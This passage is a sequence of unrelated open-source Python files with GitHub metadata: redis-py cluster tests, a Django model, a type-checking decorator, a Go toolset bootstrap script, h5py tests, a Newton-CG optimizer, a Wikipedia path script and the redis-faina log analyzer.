response = wait_for_command(r, m, "nothing", key=key)
assert response is None
def test_response_values(self, r):
db = 0
key = "foo"
node = r.get_node_from_key(key)
with r.monitor(target_node=node) as m:
r.ping(target_nodes=node)
response = wait_for_command(r, m, "PING", key=key)
assert isinstance(response["time"], float)
assert response["db"] == db
assert response["client_type"] in ("tcp", "unix")
assert isinstance(response["client_address"], str)
assert isinstance(response["client_port"], str)
assert response["command"] == "PING"
def test_command_with_quoted_key(self, r):
key = "{foo}1"
node = r.get_node_from_key(key)
with r.monitor(node) as m:
r.get('{foo}"bar')
response = wait_for_command(r, m, 'GET {foo}"bar', key=key)
assert response["command"] == 'GET {foo}"bar'
def test_command_with_binary_data(self, r):
key = "{foo}1"
node = r.get_node_from_key(key)
with r.monitor(target_node=node) as m:
byte_string = b"{foo}bar\x92"
r.get(byte_string)
response = wait_for_command(r, m, "GET {foo}bar\\x92", key=key)
assert response["command"] == "GET {foo}bar\\x92"
def test_command_with_escaped_data(self, r):
key = "{foo}1"
node = r.get_node_from_key(key)
with r.monitor(target_node=node) as m:
byte_string = b"{foo}bar\\x92"
r.get(byte_string)
response = wait_for_command(r, m, "GET {foo}bar\\\\x92", key=key)
assert response["command"] == "GET {foo}bar\\\\x92"
def test_flush(self, r):
r.set("x", "1")
r.set("z", "1")
r.flushall()
assert r.get("x") is None
assert r.get("y") is None
|
{
"content_hash": "b099d640b6365676368e720e31347b96",
"timestamp": "",
"source": "github",
"line_count": 2795,
"max_line_length": 88,
"avg_line_length": 37.979248658318426,
"alnum_prop": 0.5424485643228578,
"repo_name": "alisaifee/redis-py",
"id": "de41a107dc80176d64837162d1bbdb5a3c0ff0a1",
"size": "106160",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_cluster.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "96"
},
{
"name": "Python",
"bytes": "1956564"
},
{
"name": "Shell",
"bytes": "11822"
}
],
"symlink_target": ""
}
|
from django.db import models
NAME_GENDER_CHOICE = (
(0, u'male'),
(1, u'female'),
(2, u'neutral'),
)
class Name(models.Model):
name = models.CharField('name', unique=True, max_length=16)
cname = models.CharField('cname', max_length=16, null=True, blank=True)
pronounce = models.CharField('pronounce', max_length=32, null=True, blank=True)
gender = models.SmallIntegerField(choices=NAME_GENDER_CHOICE, db_index=True, default=0)
rank = models.IntegerField('rank', default=0)
description = models.TextField('description', null=True, blank=True)
mp3 = models.FileField(upload_to='./mp3', blank=True)
def __unicode__(self):
return self.name
def has_cname(self):
return bool(self.cname)
def has_description(self):
return bool(self.description)
class Pinyin(models.Model):
name = models.CharField('name', unique=True, max_length=16)
roma = models.TextField('description', null=True, blank=True)
def __unicode__(self):
return self.name
|
{
"content_hash": "e4793c13e88bb9ba868fbf65f66152e1",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 91,
"avg_line_length": 34.65,
"alnum_prop": 0.5202020202020202,
"repo_name": "masiqi/ename",
"id": "14ddb9bb2ef0b9fd7ab1e8c3f11fc7987f0b704a",
"size": "1406",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "name/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "10680"
},
{
"name": "Python",
"bytes": "171679"
}
],
"symlink_target": ""
}
|
"""
Functions that help with dynamically creating decorators.
:copyright: 2008 by Takanori Ishikawa
:license: MIT, see LICENSE for more details.
"""
from types import NoneType
from modipyd.utils.core import sequence
def require(**types):
"""
Lets you annotate a function with argument type requirements.
These type requirements are automatically checked by the system at
function invocation time.
"""
# pylint: disable-msg=W0622
def decorator(fn):
code = fn.func_code
argnames = code.co_varnames[:code.co_argcount]
argmaps = dict((name, i) for i, name in enumerate(argnames))
# None -> NoneType conversion
for name, constraints in types.iteritems():
constraints = sequence(constraints)
constraints = [c is None and NoneType or c for c in constraints]
if len(constraints) == 1:
types[name] = constraints[0]
else:
types[name] = tuple(constraints)
# pylint: disable-msg=W0621
# :W0621: *Redefining name %r from outer scope (line %s)*
def type_checker(*args, **kwargs):
for name in argmaps:
i = argmaps[name]
if i < len(args):
value = args[i]
elif name in kwargs:
value = kwargs[name]
else:
# maybe default value
continue
try:
constraint = types[name]
if (callable(constraint) and
not isinstance(constraint, type)):
if not constraint(value):
raise TypeError("Type checking of '%s' was failed: "
"%s(%s)" % (name, value, type(value)))
elif not isinstance(value, constraint):
raise TypeError(
"Expected '%s' to be %s, but was %s." %
(name, types[name], type(value)))
except KeyError:
pass
return fn(*args, **kwargs)
type_checker.__name__ = fn.__name__
type_checker.__module__ = fn.__module__
type_checker.__dict__ = fn.__dict__
type_checker.__doc__ = fn.__doc__
return type_checker
return decorator
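# A minimal usage sketch (added for illustration, not part of the module):
# `require` maps argument names to type constraints; `None` stands for
# NoneType, a tuple allows alternatives, and a non-type callable acts as a
# predicate on the value.
#
#     @require(count=int, label=(str, None))
#     def repeat(count, label=None):
#         return (label or '-') * count
#
#     repeat(3, 'ab')  # OK, returns 'ababab'
#     repeat('3')      # TypeError: Expected 'count' to be <type 'int'>, ...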
|
{
"content_hash": "c98c234fb27b008b461224639b5dcc0a",
"timestamp": "",
"source": "github",
"line_count": 69,
"max_line_length": 80,
"avg_line_length": 34.88405797101449,
"alnum_prop": 0.5118404653095139,
"repo_name": "ishikawa/modipyd",
"id": "10f6e4cb927ac5215574556aa913e91eaa307472",
"size": "2407",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "modipyd/utils/decorators.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "154416"
}
],
"symlink_target": ""
}
|
"""Prepares a local hermetic Go installation.
- Downloads and unpacks the Go toolset in ../golang.
"""
import contextlib
import logging
import os
import platform
import shutil
import stat
import subprocess
import sys
import tarfile
import tempfile
import urllib
import zipfile
# TODO(vadimsh): Migrate to new golang.org/x/ paths once Golang moves to
# git completely.
LOGGER = logging.getLogger(__name__)
# /path/to/util/bot
ROOT = os.path.dirname(os.path.abspath(__file__))
# Where to install Go toolset to. GOROOT would be <TOOLSET_ROOT>/go.
TOOLSET_ROOT = os.path.join(os.path.dirname(ROOT), 'golang')
# Default workspace with infra go code.
WORKSPACE = os.path.join(ROOT, 'go')
# Platform-dependent suffix for executable files.
EXE_SFX = '.exe' if sys.platform == 'win32' else ''
# Pinned version of Go toolset to download.
TOOLSET_VERSION = 'go1.7.3'
# Platform dependent portion of a download URL. See http://golang.org/dl/.
TOOLSET_VARIANTS = {
('darwin', 'x86-64'): 'darwin-amd64.tar.gz',
('linux2', 'x86-32'): 'linux-386.tar.gz',
('linux2', 'x86-64'): 'linux-amd64.tar.gz',
('win32', 'x86-32'): 'windows-386.zip',
('win32', 'x86-64'): 'windows-amd64.zip',
}
# Download URL root.
DOWNLOAD_URL_PREFIX = 'https://storage.googleapis.com/golang'
class Failure(Exception):
"""Bootstrap failed."""
def get_toolset_url():
"""URL of a platform specific Go toolset archive."""
# TODO(vadimsh): Support toolset for cross-compilation.
arch = {
'amd64': 'x86-64',
'x86_64': 'x86-64',
'i386': 'x86-32',
'x86': 'x86-32',
}.get(platform.machine().lower())
variant = TOOLSET_VARIANTS.get((sys.platform, arch))
if not variant:
# TODO(vadimsh): Compile go lang from source.
raise Failure('Unrecognized platform')
return '%s/%s.%s' % (DOWNLOAD_URL_PREFIX, TOOLSET_VERSION, variant)
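# With the pinned constants above, 64-bit Linux (sys.platform == 'linux2',
# platform.machine() == 'x86_64') resolves to:
#   https://storage.googleapis.com/golang/go1.7.3.linux-amd64.tar.gz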
def read_file(path):
"""Returns contents of a given file or None if not readable."""
assert isinstance(path, (list, tuple))
try:
with open(os.path.join(*path), 'r') as f:
return f.read()
except IOError:
return None
def write_file(path, data):
"""Writes |data| to a file."""
assert isinstance(path, (list, tuple))
with open(os.path.join(*path), 'w') as f:
f.write(data)
def remove_directory(path):
"""Recursively removes a directory."""
assert isinstance(path, (list, tuple))
p = os.path.join(*path)
if not os.path.exists(p):
return
LOGGER.info('Removing %s', p)
# Crutch to remove read-only file (.git/* in particular) on Windows.
def onerror(func, path, _exc_info):
if not os.access(path, os.W_OK):
os.chmod(path, stat.S_IWUSR)
func(path)
else:
raise
shutil.rmtree(p, onerror=onerror if sys.platform == 'win32' else None)
def install_toolset(toolset_root, url):
"""Downloads and installs Go toolset.
GOROOT would be <toolset_root>/go/.
"""
if not os.path.exists(toolset_root):
os.makedirs(toolset_root)
pkg_path = os.path.join(toolset_root, url[url.rfind('/')+1:])
LOGGER.info('Downloading %s...', url)
download_file(url, pkg_path)
LOGGER.info('Extracting...')
if pkg_path.endswith('.zip'):
with zipfile.ZipFile(pkg_path, 'r') as f:
f.extractall(toolset_root)
elif pkg_path.endswith('.tar.gz'):
with tarfile.open(pkg_path, 'r:gz') as f:
f.extractall(toolset_root)
else:
raise Failure('Unrecognized archive format')
LOGGER.info('Validating...')
if not check_hello_world(toolset_root):
raise Failure('Something is not right, test program doesn\'t work')
def download_file(url, path):
"""Fetches |url| to |path|."""
last_progress = [0]
def report(a, b, c):
progress = int(a * b * 100.0 / c)
if progress != last_progress[0]:
print >> sys.stderr, 'Downloading... %d%%' % progress
last_progress[0] = progress
# TODO(vadimsh): Use something less crippled, something that validates SSL.
urllib.urlretrieve(url, path, reporthook=report)
@contextlib.contextmanager
def temp_dir(path):
"""Creates a temporary directory, then deletes it."""
tmp = tempfile.mkdtemp(dir=path)
try:
yield tmp
finally:
remove_directory([tmp])
def check_hello_world(toolset_root):
"""Compiles and runs 'hello world' program to verify that toolset works."""
with temp_dir(toolset_root) as tmp:
path = os.path.join(tmp, 'hello.go')
write_file([path], r"""
package main
func main() { println("hello, world\n") }
""")
out = subprocess.check_output(
[get_go_exe(toolset_root), 'run', path],
env=get_go_environ(toolset_root, tmp),
stderr=subprocess.STDOUT)
if out.strip() != 'hello, world':
LOGGER.error('Failed to run sample program:\n%s', out)
return False
return True
def ensure_toolset_installed(toolset_root):
"""Installs or updates Go toolset if necessary.
Returns True if new toolset was installed.
"""
installed = read_file([toolset_root, 'INSTALLED_TOOLSET'])
available = get_toolset_url()
if installed == available:
LOGGER.debug('Go toolset is up-to-date: %s', TOOLSET_VERSION)
return False
LOGGER.info('Installing Go toolset.')
LOGGER.info(' Old toolset is %s', installed)
LOGGER.info(' New toolset is %s', available)
remove_directory([toolset_root])
install_toolset(toolset_root, available)
LOGGER.info('Go toolset installed: %s', TOOLSET_VERSION)
write_file([toolset_root, 'INSTALLED_TOOLSET'], available)
return True
def get_go_environ(
toolset_root,
workspace=None):
"""Returns a copy of os.environ with added GO* environment variables.
Overrides GOROOT, GOPATH and GOBIN. Keeps everything else. Idempotent.
Args:
toolset_root: GOROOT would be <toolset_root>/go.
workspace: main workspace directory or None if compiling in GOROOT.
"""
env = os.environ.copy()
env['GOROOT'] = os.path.join(toolset_root, 'go')
if workspace:
env['GOBIN'] = os.path.join(workspace, 'bin')
else:
env.pop('GOBIN', None)
all_go_paths = []
if workspace:
all_go_paths.append(workspace)
env['GOPATH'] = os.pathsep.join(all_go_paths)
# New PATH entries.
paths_to_add = [
os.path.join(env['GOROOT'], 'bin'),
env.get('GOBIN'),
]
# Make sure not to add duplicates entries to PATH over and over again when
# get_go_environ is invoked multiple times.
path = env['PATH'].split(os.pathsep)
paths_to_add = [p for p in paths_to_add if p and p not in path]
env['PATH'] = os.pathsep.join(paths_to_add + path)
return env
def get_go_exe(toolset_root):
"""Returns path to go executable."""
return os.path.join(toolset_root, 'go', 'bin', 'go' + EXE_SFX)
def bootstrap(logging_level):
"""Installs all dependencies in default locations.
Supposed to be called at the beginning of some script (it modifies logger).
Args:
logging_level: logging level of bootstrap process.
"""
logging.basicConfig()
LOGGER.setLevel(logging_level)
ensure_toolset_installed(TOOLSET_ROOT)
def prepare_go_environ():
"""Returns dict with environment variables to set to use Go toolset.
Installs or updates the toolset if necessary.
"""
bootstrap(logging.INFO)
return get_go_environ(TOOLSET_ROOT, WORKSPACE)
def find_executable(name, workspaces):
"""Returns full path to an executable in some bin/ (in GOROOT or GOBIN)."""
basename = name
if EXE_SFX and basename.endswith(EXE_SFX):
basename = basename[:-len(EXE_SFX)]
roots = [os.path.join(TOOLSET_ROOT, 'go', 'bin')]
for path in workspaces:
roots.extend([
os.path.join(path, 'bin'),
])
for root in roots:
full_path = os.path.join(root, basename + EXE_SFX)
if os.path.exists(full_path):
return full_path
return name
def main(args):
if args:
print >> sys.stderr, sys.modules[__name__].__doc__,
return 2
bootstrap(logging.DEBUG)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
{
"content_hash": "4f3607adb7b1aa6641393618d8b2a9a8",
"timestamp": "",
"source": "github",
"line_count": 286,
"max_line_length": 77,
"avg_line_length": 27.615384615384617,
"alnum_prop": 0.6686502912129653,
"repo_name": "MichaLasry/ImageTalke",
"id": "5661be2d3660931a641a33afc651f93e85e9d7b3",
"size": "8257",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "functions/node_modules/firebase-admin/node_modules/grpc/third_party/boringssl/util/bot/go/bootstrap.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "16893"
},
{
"name": "HTML",
"bytes": "8629"
},
{
"name": "JavaScript",
"bytes": "1948"
},
{
"name": "TypeScript",
"bytes": "75238"
}
],
"symlink_target": ""
}
|
"""
H5T tests. This handles the general API behavior and exceptions; full
type-specific behavior (including conversion) is tested elsewhere.
"""
from h5py import tests
from h5py import *
import numpy as np
class Base(tests.HTest):
pass
class TestCreate(Base):
def test_create(self):
""" (H5T) create() """
tid = h5t.create(h5t.OPAQUE, 72)
self.assertIsInstance(tid, h5t.TypeOpaqueID)
def test_exc(self):
""" (H5T) ValueError for non-opaque, non-compound class """
self.assertRaises(ValueError, h5t.create, h5t.INTEGER, 4)
class TestCommit(Base):
def setUp(self):
self.fid, self.name = tests.gettemp()
def tearDown(self):
import os
self.fid.close()
os.unlink(self.name)
def test_commit_committed(self):
""" (H5T) Commit type changes committed() """
tid = h5t.STD_I32LE.copy()
self.assert_(not tid.committed())
tid.commit(self.fid, 'name')
self.assert_(tid.committed())
@tests.require(api=18)
def test_commit_pl(self):
""" (H5T) Commit type with non-default LCPL """
tid = h5t.STD_I32LE.copy()
tid.commit(self.fid, 'name', lcpl=h5p.create(h5p.LINK_CREATE))
self.assert_(tid.committed())
def test_open(self):
""" (H5T) Open committed type """
tid = h5t.STD_I32LE.copy()
tid.commit(self.fid, 'name')
tid2 = h5t.open(self.fid, 'name')
self.assertEqual(tid, tid2)
def test_open_exc(self):
""" (H5T) Open missing type raises KeyError """
self.assertRaises(KeyError, h5t.open, self.fid, 'missing')
class TestTypeID(Base):
""" Common simple TypeID operations """
def test_copy(self):
""" (H5T) copy() """
tid = h5t.create(h5t.OPAQUE, 72)
tid2 = tid.copy()
self.assertEqual(tid, tid2)
self.assert_(tid is not tid2)
def test_equal(self):
""" (H5T) equal() """
tid = h5t.STD_I32LE.copy()
self.assert_(tid.equal(h5t.STD_I32LE))
self.assert_(h5t.STD_I32LE.equal(tid))
self.assert_(not tid.equal(h5t.STD_I32BE))
def test_get_class(self):
""" (H5T) get_class() """
self.assertEqual(h5t.STD_I32LE.get_class(), h5t.INTEGER)
class TestEncodeDecode(Base):
def setUp(self):
self.tid = h5t.STD_I32LE.copy()
def tearDown(self):
del self.tid
@tests.require(api=18)
def test_ed(self):
""" (H5T) Encode/decode round trip """
enc = self.tid.encode()
self.assertIsInstance(enc, str)
dec = h5t.decode(enc)
self.assertEqual(self.tid, dec)
@tests.require(api=18)
def test_pickle(self):
""" (H5T) Encode/decode round trip via pickling """
import pickle
pkl = pickle.dumps(self.tid)
dec = pickle.loads(pkl)
self.assertEqual(self.tid, dec)
class TestFloat(Base):
@tests.require(hasattr(np, 'float128'))
def test_float_exc(self):
""" (H5T) Unsupported float size raises TypeError """
self.assertRaises(TypeError, h5t.py_create, np.float128)
class TestInteger(Base):
def test_order(self):
""" (H5T) integer byte order """
tid = h5t.STD_I32LE.copy()
self.assertEqual(tid.get_order(), h5t.ORDER_LE)
tid.set_order(h5t.ORDER_BE)
self.assertEqual(tid.get_order(), h5t.ORDER_BE)
def test_sign(self):
""" (H5T) integer sign """
tid = h5t.STD_I32LE.copy()
self.assertEqual(tid.get_sign(), h5t.SGN_2)
tid.set_sign(h5t.SGN_NONE)
self.assertEqual(tid.get_sign(), h5t.SGN_NONE)
|
{
"content_hash": "b052ffd0e691217dcdadf37461160a47",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 74,
"avg_line_length": 28.333333333333332,
"alnum_prop": 0.5937072503419972,
"repo_name": "qsnake/h5py",
"id": "a012407cf0dd8e555f060e190122f57fc5cd5340",
"size": "3656",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "h5py/tests/low/test_h5t.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "8023197"
},
{
"name": "Python",
"bytes": "257412"
}
],
"symlink_target": ""
}
|
"""
Our own implementation of the Newton algorithm
Unlike the scipy.optimize version, this version of the Newton conjugate
gradient solver uses only one function call to retrieve the
func value, the gradient value and a callable for the Hessian matvec
product. If the function call is very expensive (e.g. for logistic
regression with large design matrix), this approach gives very
significant speedups.
"""
# This is a modified file from scipy.optimize
# Original authors: Travis Oliphant, Eric Jones
# Modifications by Gael Varoquaux, Mathieu Blondel and Tom Dupre la Tour
# License: BSD
import warnings
import numpy as np
from scipy.optimize.linesearch import line_search_wolfe2, line_search_wolfe1
class _LineSearchError(RuntimeError):
pass
def _line_search_wolfe12(f, fprime, xk, pk, gfk, old_fval, old_old_fval,
**kwargs):
"""
Same as line_search_wolfe1, but falls back to line_search_wolfe2 if a
suitable step length is not found there, and raises an exception if no
suitable step length is found by either.
Raises
------
_LineSearchError
If no suitable step size is found
"""
ret = line_search_wolfe1(f, fprime, xk, pk, gfk,
old_fval, old_old_fval,
**kwargs)
if ret[0] is None:
# line search failed: try different one.
ret = line_search_wolfe2(f, fprime, xk, pk, gfk,
old_fval, old_old_fval, **kwargs)
if ret[0] is None:
raise _LineSearchError()
return ret
def _cg(fhess_p, fgrad, maxiter, tol):
"""
Solve iteratively the Newton system 'fhess_p . xsupi = -fgrad'
with the conjugate gradient method.
Parameters
----------
fhess_p : callable
Function that takes a vector as a parameter and returns the
matrix product of the Hessian and that vector
fgrad : ndarray, shape (n_features,) or (n_features + 1,)
Gradient vector
maxiter : int
Maximum number of CG iterations.
tol : float
Stopping criterion.
Returns
-------
xsupi : ndarray, shape (n_features,) or (n_features + 1,)
Estimated solution
"""
xsupi = np.zeros(len(fgrad), dtype=fgrad.dtype)
ri = fgrad
psupi = -ri
i = 0
dri0 = np.dot(ri, ri)
while i <= maxiter:
if np.sum(np.abs(ri)) <= tol:
break
Ap = fhess_p(psupi)
# check curvature
curv = np.dot(psupi, Ap)
if 0 <= curv <= 3 * np.finfo(np.float64).eps:
break
elif curv < 0:
if i > 0:
break
else:
# fall back to steepest descent direction
xsupi += dri0 / curv * psupi
break
alphai = dri0 / curv
xsupi += alphai * psupi
ri = ri + alphai * Ap
dri1 = np.dot(ri, ri)
betai = dri1 / dri0
psupi = -ri + betai * psupi
i = i + 1
dri0 = dri1 # update np.dot(ri,ri) for next time.
return xsupi
def newton_cg(grad_hess, func, grad, x0, args=(), tol=1e-4,
maxiter=100, maxinner=200, line_search=True, warn=True):
"""
Minimization of scalar function of one or more variables using the
Newton-CG algorithm.
Parameters
----------
grad_hess : callable
Should return the gradient and a callable returning the matvec product
of the Hessian.
func : callable
Should return the value of the function.
grad : callable
Should return the gradient. This is used by the line search
functions.
x0 : array of float
Initial guess.
args: tuple, optional
Arguments passed to grad_hess, func and grad.
tol : float
Stopping criterion. The iteration will stop when
``max{|g_i | i = 1, ..., n} <= tol``
where ``g_i`` is the i-th component of the gradient.
maxiter : int
Maximum number of Newton iterations.
maxinner : int
Maximum number of CG iterations per Newton step.
line_search: boolean
Whether to use a line search or not.
warn: boolean
Whether to warn when the solver did not converge.
Returns
-------
xk : ndarray of float
Estimated minimum.
"""
x0 = np.asarray(x0).flatten()
xk = x0
k = 0
if line_search:
old_fval = func(x0, *args)
old_old_fval = None
# Outer loop: our Newton iteration
while k < maxiter:
# Compute a search direction pk by applying the CG method to
# del2 f(xk) p = - fgrad f(xk) starting from 0.
fgrad, fhess_p = grad_hess(xk, *args)
absgrad = np.abs(fgrad)
if np.max(absgrad) < tol:
break
maggrad = np.sum(absgrad)
eta = min([0.5, np.sqrt(maggrad)])
termcond = eta * maggrad
# Inner loop: solve the Newton update by conjugate gradient, to
# avoid inverting the Hessian
xsupi = _cg(fhess_p, fgrad, maxiter=maxinner, tol=termcond)
alphak = 1.0
if line_search:
try:
alphak, fc, gc, old_fval, old_old_fval, gfkp1 = \
_line_search_wolfe12(func, grad, xk, xsupi, fgrad,
old_fval, old_old_fval, args=args)
except _LineSearchError:
warnings.warn('Line Search failed')
break
xk = xk + alphak * xsupi # upcast if necessary
k += 1
if warn and k >= maxiter:
warnings.warn("newton-cg failed to converge. Increase the "
"number of iterations.")
return xk, k
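# A minimal usage sketch (added for illustration, not part of the original
# module): minimize the strictly convex quadratic 0.5 * x.A.x - b.x, whose
# gradient is A.x - b and whose Hessian is the constant matrix A, so the
# minimizer solves A.x = b.
#
#     A = np.array([[3.0, 1.0], [1.0, 2.0]])
#     b = np.array([1.0, -1.0])
#     func = lambda x: 0.5 * x.dot(A).dot(x) - b.dot(x)
#     grad = lambda x: A.dot(x) - b
#     grad_hess = lambda x: (A.dot(x) - b, lambda p: A.dot(p))
#     xk, n_iter = newton_cg(grad_hess, func, grad, x0=np.zeros(2))
#     # xk is approximately np.linalg.solve(A, b)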
|
{
"content_hash": "26499988b3e05200f67c3d780b03abcd",
"timestamp": "",
"source": "github",
"line_count": 203,
"max_line_length": 78,
"avg_line_length": 27.886699507389164,
"alnum_prop": 0.5797562268150503,
"repo_name": "DailyActie/Surrogate-Model",
"id": "0ecb5e0e18db73965d70e8dc6b0f3fd5ddaa4472",
"size": "5661",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "01-codes/scikit-learn-master/sklearn/utils/optimize.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "345"
},
{
"name": "Batchfile",
"bytes": "18746"
},
{
"name": "C",
"bytes": "13004913"
},
{
"name": "C++",
"bytes": "14692003"
},
{
"name": "CMake",
"bytes": "72831"
},
{
"name": "CSS",
"bytes": "303488"
},
{
"name": "Fortran",
"bytes": "7339415"
},
{
"name": "HTML",
"bytes": "854774"
},
{
"name": "Java",
"bytes": "38854"
},
{
"name": "JavaScript",
"bytes": "2432846"
},
{
"name": "Jupyter Notebook",
"bytes": "829689"
},
{
"name": "M4",
"bytes": "1379"
},
{
"name": "Makefile",
"bytes": "48708"
},
{
"name": "Matlab",
"bytes": "4346"
},
{
"name": "Objective-C",
"bytes": "567"
},
{
"name": "PHP",
"bytes": "93585"
},
{
"name": "Pascal",
"bytes": "1449"
},
{
"name": "Perl",
"bytes": "1152272"
},
{
"name": "PowerShell",
"bytes": "17042"
},
{
"name": "Python",
"bytes": "34668203"
},
{
"name": "Roff",
"bytes": "5925"
},
{
"name": "Ruby",
"bytes": "92498"
},
{
"name": "Shell",
"bytes": "94698"
},
{
"name": "TeX",
"bytes": "156540"
},
{
"name": "TypeScript",
"bytes": "41691"
}
],
"symlink_target": ""
}
|
import logging
import sys
from lib.wikipediaresolver import WikipediaResolver
from lib.prettyfier import Prettyfier
__author__ = 'jnowak'
logging.basicConfig(format='%(message)s', level=logging.DEBUG)
try:
finish_at = sys.argv[2].decode('utf-8')
except IndexError:
finish_at = 'Straż Pożarna'
try:
start_from = sys.argv[1].decode('utf-8')
except IndexError:
logging.error('Usage: python parse.py <start_from> <finish_at> (optional)')
exit()
resolver = WikipediaResolver(start_from, finish_at)
links = resolver.solve()
Prettyfier.print_nicely(links)
|
{
"content_hash": "3d30678a7bd795ca695f926112514880",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 79,
"avg_line_length": 21.40740740740741,
"alnum_prop": 0.7249134948096886,
"repo_name": "diego351/wikiparser",
"id": "b7382b816e06962703bd1577cc65a21ae3f68955",
"size": "604",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "parse.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4339"
}
],
"symlink_target": ""
}
|
import argparse
import sys
from collections import defaultdict
import re
line_re_24 = re.compile(r"""
^(?P<timestamp>[\d\.]+)\s(\(db\s(?P<db>\d+)\)\s)?"(?P<command>\w+)"(\s"(?P<key>[^(?<!\\)"]+)(?<!\\)")?(\s(?P<args>.+))?$
""", re.VERBOSE)
line_re_26 = re.compile(r"""
^(?P<timestamp>[\d\.]+)\s\[(?P<db>\d+)\s\d+\.\d+\.\d+\.\d+:\d+]\s"(?P<command>\w+)"(\s"(?P<key>[^(?<!\\)"]+)(?<!\\)")?(\s(?P<args>.+))?$
""", re.VERBOSE)
class StatCounter(object):
def __init__(self, prefix_delim=':', redis_version=2.6):
self.line_count = 0
self.skipped_lines = 0
self.commands = defaultdict(int)
self.keys = defaultdict(int)
self.prefixes = defaultdict(int)
self.times = []
self._cached_sorts = {}
self.start_ts = None
self.last_ts = None
self.last_entry = None
self.prefix_delim = prefix_delim
self.redis_version = redis_version
self.line_re = line_re_24 if self.redis_version < 2.5 else line_re_26
def _record_duration(self, entry):
ts = float(entry['timestamp']) * 1000 * 1000 # microseconds
if not self.start_ts:
self.start_ts = ts
self.last_ts = ts
duration = ts - self.last_ts
if self.redis_version < 2.5:
cur_entry = entry
else:
cur_entry = self.last_entry
self.last_entry = entry
if duration and cur_entry:
self.times.append((duration, cur_entry))
self.last_ts = ts
def _record_command(self, entry):
self.commands[entry['command']] += 1
def _record_key(self, key):
self.keys[key] += 1
parts = key.split(self.prefix_delim)
if len(parts) > 1:
self.prefixes[parts[0]] += 1
@staticmethod
def _reformat_entry(entry):
max_args_to_show = 5
output = '"%(command)s"' % entry
if entry['key']:
output += ' "%(key)s"' % entry
if entry['args']:
arg_parts = entry['args'].split(' ')
ellipses = ' ...' if len(arg_parts) > max_args_to_show else ''
output += ' %s%s' % (' '.join(arg_parts[0:max_args_to_show]), ellipses)
return output
def _get_or_sort_list(self, ls):
key = id(ls)
if key not in self._cached_sorts:
sorted_items = sorted(ls)
self._cached_sorts[key] = sorted_items
return self._cached_sorts[key]
def _time_stats(self, times):
sorted_times = self._get_or_sort_list(times)
num_times = len(sorted_times)
percent_50 = sorted_times[int(num_times / 2)][0]
percent_75 = sorted_times[int(num_times * .75)][0]
percent_90 = sorted_times[int(num_times * .90)][0]
percent_99 = sorted_times[int(num_times * .99)][0]
return (("Median", percent_50),
("75%", percent_75),
("90%", percent_90),
("99%", percent_99))
def _heaviest_commands(self, times):
times_by_command = defaultdict(int)
for time, entry in times:
times_by_command[entry['command']] += time
return self._top_n(times_by_command)
def _slowest_commands(self, times, n=8):
sorted_times = self._get_or_sort_list(times)
slowest_commands = reversed(sorted_times[-n:])
printable_commands = [(str(time), self._reformat_entry(entry)) \
for time, entry in slowest_commands]
return printable_commands
def _general_stats(self):
total_time = (self.last_ts - self.start_ts) / (1000*1000)
return (
("Lines Processed", self.line_count),
("Commands/Sec", '%.2f' % (self.line_count / total_time))
)
def process_entry(self, entry):
self._record_duration(entry)
self._record_command(entry)
if entry['key']:
self._record_key(entry['key'])
def _top_n(self, stat, n=8):
sorted_items = sorted(stat.iteritems(), key = lambda x: x[1], reverse = True)
return sorted_items[:n]
def _pretty_print(self, result, title, percentages=False):
print title
print '=' * 40
if not result:
print 'n/a\n'
return
max_key_len = max((len(x[0]) for x in result))
max_val_len = max((len(str(x[1])) for x in result))
for key, val in result:
key_padding = max(max_key_len - len(key), 0) * ' '
if percentages:
val_padding = max(max_val_len - len(str(val)), 0) * ' '
val = '%s%s\t(%.2f%%)' % (val, val_padding, (float(val) / self.line_count) * 100)
print key, key_padding, '\t', val
print
def print_stats(self):
self._pretty_print(self._general_stats(), 'Overall Stats')
self._pretty_print(self._top_n(self.prefixes), 'Top Prefixes', percentages = True)
self._pretty_print(self._top_n(self.keys), 'Top Keys', percentages = True)
self._pretty_print(self._top_n(self.commands), 'Top Commands', percentages = True)
self._pretty_print(self._time_stats(self.times), 'Command Time (microsecs)')
self._pretty_print(self._heaviest_commands(self.times), 'Heaviest Commands (microsecs)')
self._pretty_print(self._slowest_commands(self.times), 'Slowest Calls')
def process_input(self, input):
for line in input:
self.line_count += 1
line = line.strip()
match = self.line_re.match(line)
if not match:
if line != "OK":
self.skipped_lines += 1
continue
self.process_entry(match.groupdict())
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'input',
type = argparse.FileType('r'),
default = sys.stdin,
nargs = '?',
help = "File to parse; will read from stdin otherwise")
parser.add_argument(
'--prefix-delimiter',
type = str,
default = ':',
help = "String to split on for delimiting prefix and rest of key",
required = False)
parser.add_argument(
'--redis-version',
type = float,
default = 2.6,
help = "Version of the redis server being monitored",
required = False)
args = parser.parse_args()
counter = StatCounter(prefix_delim = args.prefix_delimiter, redis_version = args.redis_version)
counter.process_input(args.input)
counter.print_stats()
|
{
"content_hash": "caefdd5bca74e3b38a19e904156f4ff6",
"timestamp": "",
"source": "github",
"line_count": 178,
"max_line_length": 140,
"avg_line_length": 36.76966292134831,
"alnum_prop": 0.545912910618793,
"repo_name": "facebookarchive/redis-faina",
"id": "73de63d9115721633d19b1052cc3c81442f2c22e",
"size": "6568",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "redis-faina.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
